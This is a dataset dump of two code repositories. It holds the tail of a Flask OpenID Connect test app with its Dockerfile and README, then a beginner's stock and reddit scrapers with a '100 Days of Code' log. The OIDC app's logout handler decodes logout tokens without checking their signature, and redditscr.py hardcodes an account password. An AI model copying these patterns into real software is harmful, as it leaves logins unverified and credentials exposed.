None\n\n current_app.config['OIDC_SCOPES'] = provider.get('scopes', provider_info.get('scopes_supported', REQUESTED_SCOPES))\n \n if 'offline_access' in current_app.config['OIDC_SCOPES']:\n current_app.config['OIDC_EXTRA_REQUEST_AUTH_PARAMS'].update({'prompt' : 'consent'})\n\n return {\n 'web' : {\n 'client_id': registration.get('client_id'),\n 'client_secret': registration.get('*client_secret*', registration.get('client_secret', None)),\n 'auth_uri': provider_info['authorization_endpoint'],\n 'token_uri': provider_info['token_endpoint'],\n 'userinfo_uri': provider_info['userinfo_endpoint'],\n 'jwks_keys': jwks_keys,\n 'redirect_uris': REDIRECT_URL,\n 'issuer': provider_info['issuer'],\n }\n }\n except Exception as e:\n raise Exception(\"Error in preparing result: {}\".format(str(e)))\n\n raise Exception(\"No secrets loaded !\")\n\noidc = MyOpenIDConnect(app)\n\[email protected]('/login/<provider>')\ndef login(provider):\n\n logger.error(\"Logging in to provider: {}\".format(provider))\n\n try:\n oidc.logout()\n oidc.init_provider(PROVIDERS[provider])\n return redirect('/private', code=302)\n except Exception as e:\n return 'Error activating provider: {}, error: {}<br/><br/><a href=\"/\">Return</a>'.format(provider, str(e))\n\[email protected]('/')\ndef hello_world():\n\n options = ''\n for i in PROVIDERS.keys():\n options += '<option value=\"{}\">{}</option>'.format(i,i)\n\n html = \"\"\"\n <h1>Welcome to my OIDC switch board</h1>\n <h2>Choose a provider...</h2>\n <select name=\"formal\" onchange=\"javascript:handleSelect(this)\">\n <option value=\"\">### select a provider ###></option>\n {}\n </select>\n\"\"\".format(options)\n\n script = \"\"\"\n <script type=\"text/javascript\">\n function handleSelect(provider) {\n if (provider > \"\") {\n window.location = \"/login/\"+provider.value;\n }\n }\n </script>\n\"\"\"\n\n help = \"\"\"\n<hr><h1>Howto</h1>\n<br/>You can manage provider details via RESTful API interface.\n<br/><br/>\n<b>Example 1. List current Providers</b><br/>\n<a href=\"/api/providers\">List Providers</a>\n<br/><br/>\n<b>Example 2. 
Add a provider that allows dynamic regfistration</b><br/>\n<br/>\n<pre>\ncurl -X PUT \\\\\n %s://%s/api/provider/test \\\\\n -H 'Content-Type: application/json' \\\\\n -d '{ \"base_url\": \"https://eduid.lab.surf.nl/\", \"description\": \"My Provider\", \"client_name\": \"testing123\" }'\n</pre>\n<br/>\nAbove provider will use 'dynamic client registration', off course this will only work if your provider allows you to do so.\n<br/><br/>\n<b>Example 3. Add a provider with client credentials</b><br/>\n<br/>\nIf you have client_id and client_secret from your provider, then specify as follows:\n<pre>\ncurl -X PUT \\\\\n %s://%s/api/provider/test \\\\\n -H 'Content-Type: application/json' \\\\\n -d '{ \"base_url\": \"https://eduid.lab.surf.nl/\", \"registration\": { \"client_id\": \"<b>YOUR CLIENT_ID</b>\", \"client_secret\": \"<b>YOUR CLIENT_SECRET</b>\" } }'\n</pre>\n<br/>\n<b>NOTE:</b> Please make sure your have registered <b>%s</b> as a valid callback uri with your provider !\n<br/>\n<hr/>\n(c)2018 Harry Kodden, <a href=\"https://github.com/HarryKodden/oidc-lab\">Source on Github</a>\n\"\"\" % (SCHEME, HOST, SCHEME, HOST, REDIRECT_URL)\n\n if oidc.user_loggedin:\n return (\n 'You are logged in with userid: %s<br/><br/>'\n '<a href=\"/private\">See private</a><br/>'\n '<a href=\"/logout\">Log out</a>'\n ) % oidc.user_getfield('sub')\n else:\n return '{}{}{}'.format(html,script,help)\n\n\[email protected]('/uma')\[email protected]_login\ndef uma():\n return render_template('uma.html', error=\"\", client=oidc.client_secrets, token=json.loads(oidc.token()))\n\nsubscriptions = {}\n\nclass ServerSentEvent(object):\n\n def __init__(self, data):\n self.data = data\n self.event = None\n self.id = None\n self.desc_map = {\n self.data : \"data\",\n self.event : \"event\",\n self.id : \"id\"\n }\n\n def encode(self):\n if not self.data:\n return \"\"\n\n lines = [\"%s: %s\" % (v, k) \n for k, v in self.desc_map.items() if k]\n \n return \"%s\\n\\n\" % \"\\n\".join(lines)\n\[email protected]('/subscribe/<sub>')\ndef subscribe(sub):\n logger.debug(\"Subscribing: {}\".format(sub))\n\n if sub not in subscriptions:\n subscriptions[sub] = []\n\n def gen():\n logger.debug(\"Making Generator...\")\n\n q = Queue()\n subscriptions[sub].append(q)\n try:\n while True:\n result = q.get(block=True)\n logger.debug(\"Queue Get: {}\".format(result))\n\n ev = ServerSentEvent(str(result))\n \n logger.debug(\"Yielding: {}\".format(ev.encode()))\n\n yield ev.encode()\n except GeneratorExit:\n logger.debug(\"Removing Generator...\")\n subscriptions[sub].remove(q)\n\n return Response(gen(), mimetype=\"text/event-stream\")\n\ndef publish(sub, msg):\n def notify():\n try:\n for sid in subscriptions[sub][:]:\n logger.debug(\"Publishing sub: {} msg: {}, sid: {}\".format(sub, msg, sid))\n sid.put(msg)\n except Exception as e:\n logger.debug(\"Exception during notify: {}\".format(str(e)))\n\n logger.debug(\"Publishing to sub: {} msg: {}\".format(sub, msg))\n if sub in subscriptions:\n gevent.spawn(notify)\n\[email protected]('/refresh')\[email protected]_login\ndef refresh():\n try:\n oidc.refresh()\n except Exception as e:\n logger.debug(\"Error during refresh: {}\".format(str(e)))\n \n return hello_me()\n\[email protected]('/private')\[email protected]_login\ndef hello_me():\n\n try:\n sub = oidc.details()[\"sub\"]\n\n script = \"\"\"\n <script>\n var eventSource = new EventSource(\"/subscribe/%s\");\n\n eventSource.onmessage = function(e) {\n console.log(e.data);\n window.location.href = \"/logout\";\n };\n </script>\n\"\"\" % 
sub\n\n except Exception as e:\n logger.debug(\"Error during script prepare: {}\".format(str(e)))\n script = \"\"\n\n refresh = ''\n \n try:\n token = '<h1>Token Details:</h1><br/><table border=\"1\">'\n token += '<tr><th>Attribute</th><th>Value</th></tr>'\n\n t = json.loads(oidc.token())['token_response']\n logger.debug(\"TOKEN: {}\".format(t))\n\n for k,v in t.items():\n token += '<tr><td>{}</td><td><pre>{}</pre></td></tr>'.format(k, v)\n\n if k == 'refresh_token':\n refresh = '<br/><a href=\"/refresh\">Refresh !</a><br/>'\n\n try:\n v = jwt.decode(v, options={\"verify_signature\": False})\n v = json.dumps(v, indent=4, sort_keys=True)\n token += '<tr><td>{} (decoded)</td><td><pre>{}</pre></td></tr>'.format(k, v)\n except:\n pass\n\n token += '</table>'\n except Exception as e:\n token = 'No token details available...{}'.format(str(e))\n\n try:\n info = oidc.details()\n\n data = '<h1>User Info:</h1><br/><table border=\"1\">'\n data += '<tr><th>Attribute</th><th>Value</th></tr>'\n if info:\n for f in info.keys():\n data += '<tr><td>{}</td><td>{}</td></tr>'.format(f, info[f])\n data += '</table>'\n except:\n data = 'No userdata available...'\n\n return ('{}<br/>{}<br/>{}<br/>{}<a href=\"/\">Return</a>'.format(script, token, data, refresh))\n\[email protected]('/test_logout/<sub>', methods=['GET'])\ndef test_logout(sub):\n publish(sub, \"Logout\")\n return \"OK\"\n\[email protected]('/logout', methods=['GET', 'POST'])\ndef logout():\n global oidc\n\n if request.method == 'POST':\n # Evaluate BackChannel logout\n # Refer: https://openid.net/specs/openid-connect-backchannel-1_0.html\n # chapter 2.5 Back-Channel Logout Request\n\n logger.debug(\"Backchannel logout request\")\n # need to evaluate the request...\n \"\"\" \n If the Logout Token is encrypted, decrypt it using the keys and algorithms that the Client specified during Registration that the OP was to use to encrypt ID Tokens.\n If ID Token encryption was negotiated with the OP at Registration time and the Logout Token is not encrypted, the RP SHOULD reject it.\n Validate the Logout Token signature in the same way that an ID Token signature is validated, with the following refinements.\n Validate the iss, aud, and iat Claims in the same way they are validated in ID Tokens.\n Verify that the Logout Token contains a sub Claim, a sid Claim, or both.\n Verify that the Logout Token contains an events Claim whose value is JSON object containing the member name http://schemas.openid.net/event/backchannel-logout.\n Verify that the Logout Token does not contain a nonce Claim.\n Optionally verify that another Logout Token with the same jti value has not been recently received.\n\"\"\"\n\n logger.debug(\"Data received: {}\".format(request.get_data().decode('utf-8')))\n\n payload = {}\n\n try:\n logout_token = request.form.get('logout_token', None)\n\n if not logout_token:\n raise Exception(\"No logout_token\")\n \n payload = jwt.decode(logout_token, verify=False)\n\n logger.debug(\"Logout Token payload: {}\".format(json.dumps(payload, indent=4, sort_keys=True)))\n \n if \"sub\" not in payload and \"sid\" not in payload:\n raise Exception(\"Missing sub and/or sid claims\")\n\n if \"events\" not in payload:\n raise Exception(\"Missing events claim\")\n\n if \"http://schemas.openid.net/event/backchannel-logout\" not in payload[\"events\"]:\n raise Exception(\"Events claim missing required member\")\n\n if \"nonce\" in payload:\n raise Exception(\"Logout token should not contain nonce claim\")\n\n except Exception as e:\n logger.debug(\"Logout Error: 
{}\".format(str(e)))\n\n r = make_response(str(e), 400)\n r.headers['Cache-Control'] = 'no-cache, no-store'\n r.headers['Pragma'] = 'no-cache'\n return r\n\n # Make response\n \"\"\"\n If the logout succeeded, the RP MUST respond with HTTP 200 OK. \n If the logout request was invalid, the RP MUST respond with HTTP 400 Bad Request. \n If the logout failed, the RP MUST respond with 501 Not Implemented. \n If the local logout succeeded but some downstream logouts have failed, the RP MUST respond with HTTP 504 Gateway Timeout.\n\nThe RP's response SHOULD include Cache-Control directives keeping the response from being cached to prevent cached responses from interfering with future logout requests. It is RECOMMENDED that these directives be used: \n\n- Cache-Control: no-cache, no-store\n- Pragma: no-cache\n\"\"\"\n if payload and \"sub\" in payload:\n publish(payload[\"sub\"], \"Logout\")\n\n r = make_response('', 200)\n r.headers['Cache-Control'] = 'no-cache, no-store'\n r.headers['Pragma'] = 'no-cache'\n return r\n \n oidc.logout()\n \n return 'Hi, you have been logged out!<br/><br/><a href=\"/\">Return</a>'\n\nif __name__ == \"__main__\":\n\n if app.debug:\n import os\n # Allow insecure oauth2 when debugging\n os.environ[\"OAUTHLIB_INSECURE_TRANSPORT\"] = \"1\"\n\n server = WSGIServer((\"\", 8000), app)\n server.serve_forever()\n"
},
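One compatibility note on oidc-lab.py: the /logout route decodes the back-channel logout token with jwt.decode(logout_token, verify=False), but the verify keyword was removed in PyJWT 2.0, and requirements.txt (next file) pins pyjwt>=2.1.0 — the same file already uses the 2.x form elsewhere (options={"verify_signature": False}). Similarly, the itsdangerous==2.0.1 pin matters because the (Timed)JSONWebSignatureSerializer classes the file imports were dropped in itsdangerous 2.1. A minimal sketch of the route's claim checks on the PyJWT 2.x API — an unsigned decode for illustration only; a production RP should verify the signature against the OP's JWKS:

```python
# Sketch: back-channel logout claim checks from /logout, using the PyJWT 2.x API.
import jwt

def parse_logout_token(logout_token):
    # Illustration only: skips signature verification.
    payload = jwt.decode(logout_token, options={"verify_signature": False})
    if "sub" not in payload and "sid" not in payload:
        raise ValueError("Missing sub and/or sid claims")
    if "http://schemas.openid.net/event/backchannel-logout" not in payload.get("events", {}):
        raise ValueError("Events claim missing required member")
    if "nonce" in payload:
        raise ValueError("Logout token must not contain a nonce claim")
    return payload
```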
{
"alpha_fraction": 0.7379310131072998,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 11.083333015441895,
"blob_id": "471e7fc846c9e3f753a9ee46d36034923ff51964",
"content_id": "468c184da7bb558c16dfbed86b6448108958eac0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 145,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 12,
"path": "/requirements.txt",
"repo_name": "HarryKodden/oidc-lab",
"src_encoding": "UTF-8",
"text": "Flask\nrequests\nrequests-oauthlib\ngunicorn\ngevent\nfuture\nflask-cache\nflask-login\nflask-oidc>=1.4.0\nflask-restful\npyjwt>=2.1.0\nitsdangerous==2.0.1\n"
},
{
"alpha_fraction": 0.7281553149223328,
"alphanum_fraction": 0.7475728392601013,
"avg_line_length": 17.176469802856445,
"blob_id": "b4e66c8483c6b1157bd88d93f92f3820235a124b",
"content_id": "9f513be2aca547e91b25f953414f9a0209d04b19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 309,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/Dockerfile",
"repo_name": "HarryKodden/oidc-lab",
"src_encoding": "UTF-8",
"text": "FROM python:3.7-stretch\n\nMAINTAINER [email protected]\n\nRUN apt-get update\n\nCOPY requirements.txt .\nRUN pip install -r requirements.txt\n\nADD oidc-lab.py /usr/local/bin/\n\nRUN echo \"Europe/Amsterdam \" > /etc/timezone\nRUN dpkg-reconfigure -f noninteractive tzdata\n\nEXPOSE 8000\n\nCMD [\"python\", \"/usr/local/bin/oidc-lab.py\"]\n"
},
{
"alpha_fraction": 0.7220259308815002,
"alphanum_fraction": 0.7385159134864807,
"avg_line_length": 30.837499618530273,
"blob_id": "269ab40c27845ed5dff16351af14182886e8e4aa",
"content_id": "090699522cae1660cc3fc59d8cc91a4702e5454c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2547,
"license_type": "no_license",
"max_line_length": 202,
"num_lines": 80,
"path": "/README.md",
"repo_name": "HarryKodden/oidc-lab",
"src_encoding": "UTF-8",
"text": "# Welcome\n\n\n\n# Example\n\n\n\n# Howto\n\n\nThis application is based on Flask-OIDC. In standard Flask-OIDC application the connection between OIDC-Client (RP) and OIDC-Server (OP) is hard-wired via compile time **client-secrets** configuration. \n\nIn this application, the connection between RP and OP is not hard-wired. It is fully adjustable dynamically at RunTime. The configuration can be adjusted via a REST Api calls, see some examples below.\n\nThis dynamic behavior is achieved by subclassing the Flask-OIDC Class *OpenIDConnect*. The method *init_provider* is only called when a user has selected the provider to authenticate against.\nFurthermore, the subclass is completely dynamic on retrieving provider configuration via the standard **.../.well-known/openid-configuration** endpoints.\n\nHope you enjoy.\n\nFeedback is appreciated.\n\n## Build\n\nIf you have docker installed, you can just run:\n\n```\ndocker build -t oidclab .\n```\n\n## Run application\n\nWith docker you enter:\n\n```\ndocker run -p 8000:8000 -d oidclab\n```\n\nNow open your browser on [http://localhost:8000](http://localhost:8000)\n\n## Configuration\n\nYou can manage provider details via RESTful API interface.\n\nIn the examples below, it is assumed you are running the application on your local machine, therefor http://localhost:8000 is taken as the address of the OIDC Relying Party host address.\n\nCommands below are to be initiated from a terminal session, you should have command **curl** available.\n\n### Example 1. List current Providers\n\n```\ncurl http://localhost:8000/api/providers\n```\n\n### Example 2. Add a provider that allows dynamic registration\n\n```\n\ncurl -X PUT \\\n http://localhost:8000/api/provider/test \\\n -H 'Content-Type: application/json' \\\n -d '{ \"base_url\": \"https://<some provider>/\", \"description\": \"My Provider\", \"client_name\": \"testing123\" }'\n```\n\n\nAbove provider will use 'dynamic client registration', off course this will only work if your provider allows you to do so.\n\n### Example 3. Add a provider with client credentials\n\nIf you have client_id and client_secret from your provider, then specify as follows:\n\n```\ncurl -X PUT \\\n http://localhost:8000/api/provider/test \\\n -H 'Content-Type: application/json' \\\n -d '{ \"base_url\": \"https://<some provider>/\", \"registration\": { \"client_id\": \"YOUR CLIENT_ID\", \"client_secret\": \"YOUR CLIENT_SECRET\" } }'\n```\n\n\n**NOTE:** Please make sure your have registered **http://localhost:8000/oidc_callback** as a valid callback uri with your provider !\n"
}
] | 4 |
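The README's curl examples translate directly to Python. A sketch of Example 2 using requests (host and port are the defaults the app serves on; the base_url echoes the value the app's own help page uses):

```python
# Registering a provider via the REST API, equivalent to the curl PUT above.
import requests

resp = requests.put(
    "http://localhost:8000/api/provider/test",
    json={
        "base_url": "https://eduid.lab.surf.nl/",
        "description": "My Provider",
        "client_name": "testing123",
    },
)
print(resp.status_code, resp.json())
```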
JayBk/100-days-of-code | https://github.com/JayBk/100-days-of-code | 94ee3d4ad663b4d39c2d2e744b06a4d2de25d024 | b0891028e568e5f873b480e1b900bf0892ebceaa | 5d84b23bf7fe9ff21b1d55eb9c4ec89fdc3b34d6 | refs/heads/master | 2021-01-11T10:04:11.735132 | 2017-01-11T04:59:26 | 2017-01-11T04:59:26 | 77,884,303 | 0 | 0 | null | 2017-01-03T04:35:34 | 2017-01-03T04:03:24 | 2017-01-03T03:44:41 | null |
[
{
"alpha_fraction": 0.6019108295440674,
"alphanum_fraction": 0.6146496534347534,
"avg_line_length": 49.2400016784668,
"blob_id": "ef68426da1fe14a48eaaace91dcd758dbb70da61",
"content_id": "a7dde435589d4ebb099cf1f63a41cd68ea92ed13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2512,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 50,
"path": "/Projects/Gui4Scrapes/stockscr.py",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "import urllib.request\nfrom bs4 import BeautifulSoup\nimport time\nimport pandas as pd\n\nclass CheckStocks(object):\n \"\"\"A class that initiates taking companies stock market names abbreviation's and checks yahoo finance for their most recent\n information and puts the results into a pandas DataFrame\"\"\"\n def __init__(self, symb=None):\n titlelist = []\n datadict = {}\n datalist = []\n if symb is None:\n symb = [abbr.upper() for abbr in input('Enter the list of Stock Market abbreviations for the companies you would like to get information for. \\\n Separate each abbreviation with a single space. Example, \"FB TWTR NFLX AAPL\" \\n \\\n Common Companies are Facebook = FB, Google = GOOG, Apple = AAPL, Netflix = NFLX, and Twitter = TWTR ... :').split()]\n\n for sym in symb:\n sym = sym.upper()\n url = 'https://finance.yahoo.com/quote/{}?p={}'.format(sym, sym)\n headerz = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'}\n\n req = urllib.request.Request(url, headers=headerz) # setting up our request, passing the url and header\n\n resp = urllib.request.urlopen(req) # passing our request along to urlopen\n time.sleep(2) # waiting 2 seconds so that we can be sure everything loads\n\n # read the html, and pass it to BeautifulSoup for parsing, telling soup what we want\n html = resp.read()\n soup = BeautifulSoup(html, 'html.parser')\n\n tagged_values = soup.find_all(\"td\", {'class': 'Ta(end) Fw(b)'})\n tagged_titles = soup.find_all(\"td\", {'class': 'C(black)'})\n tagged_index = soup.find_all(\"h1\", {'class': 'D(ib) Fz(18px)'})\n\n datadict[sym] = pd.Series([x.get_text() for x in tagged_values], index=[t.get_text() for t in tagged_titles])\n datalist.append(datadict[sym])\n datadict['titles'] = [i.get_text() for i in tagged_index]\n titlelist.append(datadict['titles'])\n # print(datadict[sym])\n self.titles = titlelist\n self.mypf = datalist\n # make the DataFrame from all of the data we got\n # print(datadict)\n # print(datalist)\n # print(titlelist)\n # titlelist = [title for sub in titlelist for title in sub]\n # mydf = pd.DataFrame(datalist, index=[title for sub in titlelist for title in sub])\n # self.mydf = mydf\n"
},
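CheckStocks above leaves its DataFrame assembly commented out, exposing instead the raw Series list (self.mypf) and the nested title list (self.titles). A sketch of finishing the job the way the commented code hints at, flattening the list-of-lists for the index (run from the Gui4Scrapes directory so the stockscr module imports):

```python
# Sketch: building the DataFrame from CheckStocks' collected Series.
# stocks.titles is a list of single-element lists, hence the flattening step.
import pandas as pd
from stockscr import CheckStocks

stocks = CheckStocks(['FB', 'GOOG'])
index = [title for sub in stocks.titles for title in sub]  # flatten list of lists
df = pd.DataFrame(stocks.mypf, index=index)
print(df)
```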
{
"alpha_fraction": 0.5904203057289124,
"alphanum_fraction": 0.5982404947280884,
"avg_line_length": 41.625,
"blob_id": "a91d3f965ef5e736aae55de99601e602d8229f26",
"content_id": "4f83015d20760b16cd0a40ecf8ae60708a4e39e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1023,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 24,
"path": "/Projects/Gui4Scrapes/redditscr.py",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "import json\nimport requests\nimport unidecode\nimport time\n\n\nclass CheckReddit(object):\n def __init__(self, subreddit=None):\n if subreddit is None:\n subreddit = input('Enter the subreddit you wan\\'t to check(Exactly):')\n credentials = {'user':'websitethrowawayi',\n 'passwd': 'incognitomode',\n 'api_type':'json'}\n session = requests.Session()\n session.headers.update({'User-Agent':'#100daysofcode :D'})\n session.post('https://www.reddit.com/api/login', data=credentials)\n time.sleep(1) # JUST WAIT A SECOND WHAT'S THE RUSH!?!?!?\n\n url = 'https://reddit.com/r/{}/.json?limit=10'.format(subreddit)\n html = session.get(url)\n data = json.loads(html.content.decode('utf-8'))\n posts = [unidecode.unidecode(headlines['data']['title']) for headlines in data['data']['children']]\n self.posts = ['{}. {}'.format(num+1, post) for num, post in enumerate(posts)]\n self.final = \"\\n\".join(self.posts)\n"
},
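CheckReddit logs in before fetching, but reddit's public JSON listings don't require a session; a descriptive User-Agent is usually enough. A minimal sketch without the login step, hitting the same endpoint and fields as the class above:

```python
# Fetching subreddit headlines without logging in; public listings are open.
import requests

def top_headlines(subreddit, limit=10):
    url = "https://www.reddit.com/r/{}/.json?limit={}".format(subreddit, limit)
    data = requests.get(url, headers={"User-Agent": "#100daysofcode :D"}).json()
    return [post["data"]["title"] for post in data["data"]["children"]]

print("\n".join(top_headlines("worldnews")))
```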
{
"alpha_fraction": 0.7214673757553101,
"alphanum_fraction": 0.741847813129425,
"avg_line_length": 48.06666564941406,
"blob_id": "2b2ee38d8578722db829b7c11291523bba8d5fba",
"content_id": "c77986128a5858391e8c7172809ff5d9f271dc85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 736,
"license_type": "no_license",
"max_line_length": 329,
"num_lines": 15,
"path": "/Projects/Gui4Scrapes/readme.md",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "#Home of Gui4Scrapes\n\nSo on Day 1 of my #100DaysOfCode I made one of the scrapers, then the next day I made another scraper. I thought to myself- Ok, your not going to make scrapers every single day for 100 days.. So I decided to make a GUI for my scrapers :D. It was really fun to make this, and I hope to make some more beautiful GUIs in the future!\n\nHere is the main GUI screen(It's not the prettiest, but neither am I xD):\n\n\nHere is the stock data relayed back as pandas series:\n\n\nHere is the /r/worldnews headlines:\n\n\nLastly, here is everything in one shot:\n\n"
},
{
"alpha_fraction": 0.7203390002250671,
"alphanum_fraction": 0.7711864113807678,
"avg_line_length": 38.33333206176758,
"blob_id": "abb90062c19127d21f5cc2dc50b519d45852bec8",
"content_id": "3f773ed07729399c9c8e8592ff9cc1551a3ebc80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 118,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 3,
"path": "/Projects/readme.md",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "#100 Days Of Code Projects\n\nI will keep my 100 days of code projects here, along with logs that I've created locally.\n"
},
{
"alpha_fraction": 0.7190178036689758,
"alphanum_fraction": 0.7518025040626526,
"avg_line_length": 139.01904296875,
"blob_id": "d408d156554f7b97eff38214b056a13e865b001c",
"content_id": "147c34a54b0da0281f276f31173ebde4e6fc0c40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14702,
"license_type": "no_license",
"max_line_length": 1462,
"num_lines": 105,
"path": "/log.md",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "# 100 Days Of Code - Log\n\n\n#Putting my 100Days on hold for now.\n\nSince I'm about to start Rmotr's Advanced Python Course, either way I'll be doing a minimum of an hour of projects and assignments for them everyday, along with helping people out and stuff. I feel I need to put everything I have into the course for a few reasons. 1- I was lucky enough to get a full scholarship for both the Intro, and Advanced class... and 2- One of the things that really helped me learn in the Intro class was completely dedicating every minute I could to the course. Whether it be assignments, projects, or helping people out I need to focus on the course for now and worry about projects later. Rmotr will keep me busy enough with projects/assignments for now :) I also have stuff for school that I'm always working on, and I really just don't have enough time to do everything, so I'm putting 100DaysOfCode on hold for now. I plan to start back up again as soon as the Advanced class ends, this way I can \"stay in shape\", Which should be sometime within the second week of February, as the last coding session is on the 8th I believe. In that case I'll take Feb 9th to figure out what I want to work on first(Day 0) and do anything I have to do before I start my 100Days again. Like I said I am also very interested in doing FreeCodeCamp projects getting back into HTML and learning CSS and JS... We'll see.. For now I'm sticking with RMOTR's Advanced Python Course- Which will be another great experience with a great group of people... \n\n**Note to self: Work on the Alexa skill(You know what I mean).**\n\n\n\n\n### Day 6: January 8th 2017\n\n**Today's Progress**: Finished up some Coursera assignments, and used HTML for the first time in 5+ years. Built a simple straight HTML web page with images and stuff, just to get the feel of HTML again- Since I plan on doing some FreeCodeCamp projects during my 100days.\n\n**Thoughts**: I really want to start using HTML CSS and JS, but I don't know if I'll overload myself trying to learn that plus everything I'm learning in Python(i.e Data Science, Flask stuff, Django stuff), plus my actual schoolwork... I think I'll be fine with basic HTML, CSS, and JS.. But getting into the more Intermediate/Advanced stuff I might be putting a little too much on my plate. I think It might be best for me to work on C and Python for now, and maybe, basic HTML, CSS and JS.. I don't know, I'll see.. Anyway, It was fun working with simple HTML since it's been so long, and I'm glad I got my Coursera assignments done on time, and I'm still sticking with #100DaysOfCode :). I need to think of a project for Day 7.. I was thinking some kind of Alex Skill ;). Hmmmmm.\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">I worked on Python assignments, and then played with HTML(Nothing crazy)- Think Last time I used it I was in HS.. It was fun! <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a></p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/818326399517913088\">January 9, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n\n\n### Day 5: January 7th 2017\n\n**Today's Progress**: Finished up the GUI! It is now fully functional :)\n\n**Thoughts**: It felt good to finish this project. I'm glad I stuck with it and actually finished it. It is now fully functional and I'm satisfied with how it turned out. 
I'll probably move on to a new project tomorrow because I really can't think of anything else I can add to the GUI besides another scraper... But I'd like to work on something else so well see what I can come up with.. One thing is for sure: I have to try and get done earlier because I've been getting done with everything at around 1:00AM and it's been extremely hard for me to get up in the morning. Tomorrow I need to work on some Coursera stuff and also work on my actually school work, but I'm definately going to slip in at least an hour of coding at the bare minimum. \n\n**Link(s) to work**: [Gui4Scrapes](https://github.com/JayBk/100-days-of-code/tree/master/Projects/Gui4Scrapes)\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Finished Day 5 <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a> ! The GUI for the scrapers is done and fully functional! :) Starting a new project tmr<a href=\"https://t.co/B0kEFeajMw\">https://t.co/B0kEFeajMw</a></p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/817978443816177664\">January 8, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n\n\n### Day 4: January 6th 2017\n\n**Today's Progress**: I would like to think that I got a lot done today.. :D I added functionality to my GUI... The reddit part is basically fully complete, you type the subreddit, click the button, and get a new window with about 10 of the hottest headlines for that subreddit. Also, the stocks part is technically functional but not complete. You can type the abbreviations, click the button, and get a new window with a DataFrame, but the entry is not taking the input correctly because I forgot to set it up; and the DataFrame is displaying all yucky.\n\n**Thoughts**: I feel like I got a lot done, and when I first got the reddit part to work completely I felt really happy that I accomplished that and wanted to keep moving foward and make it look nicer. I made it look as nice as I can using basic fonts and stuff for now.. I ran into a few problems here and there, but nothing that was too crazy to figure out.. I had a fun day and I'm really glad I'm doing this and I hope that I'll stick with it for the full 100 days because I know that I will grow so much. For now, I'm tired as shit. \n\n**Link(s) to work**: [Gist: Incomplete But Functional GUI](https://gist.github.com/JayBk/d1a1836f3427a078ce431be59e312520) \n\n[Imgur: What the main GUI looks like](http://imgur.com/a/GWlOU). \n\nThe rest of these are after you enter text and click the appropriate button: \n\n[Imgur: How the DataFrame(scrapingstocks) looks displaying it with Text](http://imgur.com/Wvw4zbb)\n\n[Imgur: How the DataFrame(scrapingstocks) looks displaying it with Message](http://imgur.com/vqUufAe)\n\n[Imgur: What the Headlines from the Subreddit of your choice look like](http://imgur.com/a/QRsLQ)\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Finished Day 4 of my <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a> ! Coming along well with the GUI, It has some pretty good functionality now! 
<a href=\"https://t.co/06jlppqm1t\">https://t.co/06jlppqm1t</a></p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/817616092105506816\">January 7, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n\n\n### Day 3: January 5th 2017\n\n**Today's Progress**: Made the basic layout for my GUI using tkinter instead of PyQt... I organized the GUI and now I'm working on the functionality of the buttons and the Entry's.. I was also working on how I was going to display the data back to the 'user' and found I can use a messagebox, so I was also toying with that... Fun day!\n\n**Thoughts**: I was going to use PyQt at first, but ran into a whole bunch of trouble. I sat down to code at like 9 o'clock again... Messing around trying to get PyQt going took me an hour, maybe even longer. I was sooo pissed off because I've using PyQt before, and I probably would've gotten more done today... But anyway I decided to go with tkinter, which isn't to hard to use.. I got some help from tutorialspoint-- which isn't what it sounds like... They just show you the commands and the syntax for certain things and explain them.. But anyway, getting the positioning to look somewhat good was kind of a challenge, but I ended up with something that didn't look too bad(I think). I started to work on making the reddit scrape button run a function that takes the input from the entry box and calls my redditscaper, then returns the data and shows it in a message box.. I have some errors, but It's a work in progress- so I'll work more on it tomorrow :). For now, I'm super tired since it's 2:26 AM; but I'm glad I stuck with my commitment AGAIN, and made it to Day 3... It's making me feel good and I don't even look at the time; it just flies by and then I notice it's 2:30AM and I'm like FUUUUU NOT AGAIN! Lol... Anyway; I had a lot of fun, and I already feel like this is really helping me improve! I can't imagine how I'd feel 